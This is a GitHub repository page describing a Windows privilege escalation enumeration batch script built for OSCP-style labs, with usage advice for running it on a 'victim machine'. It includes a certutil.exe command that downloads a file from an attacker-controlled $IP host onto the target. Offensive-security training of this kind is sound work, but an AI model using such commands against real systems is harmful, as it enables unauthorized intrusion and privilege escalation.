Skip to content

Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind

Notifications You must be signed in to change notification settings

Tib3rius/windowsprivchecker

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 

Repository files navigation

Windows Priv Checker

A Windows privilege escalation (enumeration) script designed with OSCP labs (i.e. legacy Windows machines without Powershell) in mind. The script represents a conglomeration of various privilege escalation checks, gathered from various sources, all done via native Windows binaries present in almost every version of Windows.

Note, the batch file also operates on the latest versions of Windows as well. PowerShell is not necessary to achieve proper OS enumeration.

Use

Copy the batch file from your attacker machine to a user writeable directory on the victim machine (typically the current users folder, the "public" user folder, or C:\Windows\Temp will be writeable).

Also (although the script will run without it), it recommended you copy (an older verison of) accesschk.exe to the same location. It is recommended you use an older version of accesschk.exe as the latest version will not work on some older Windows machines. The archived version here worked well in my experience (thanks, g0tmi1k); https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

There are many ways to copy over files. I found certutil.exe to be the most reliable across Windows editions. For example;

certutil.exe -urlcache -split -f "http://$IP/Powerless.bat" Powerless.bat

The script may generate a lot of output. My recommended approach is to go through it sequentially making a list of 'interesting' things to look at, sorting them as you go. Once you've reached the end of the output, go through your list in order of what stuck out the most.

You will do yourself a great disservice if you lean heavily on kernel exploits at the expense of thorough Windows enumeration. Although you may find kernel exploits often in work in the labs, try to find other avenues as well.

Sources

About

Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Batchfile 100.0%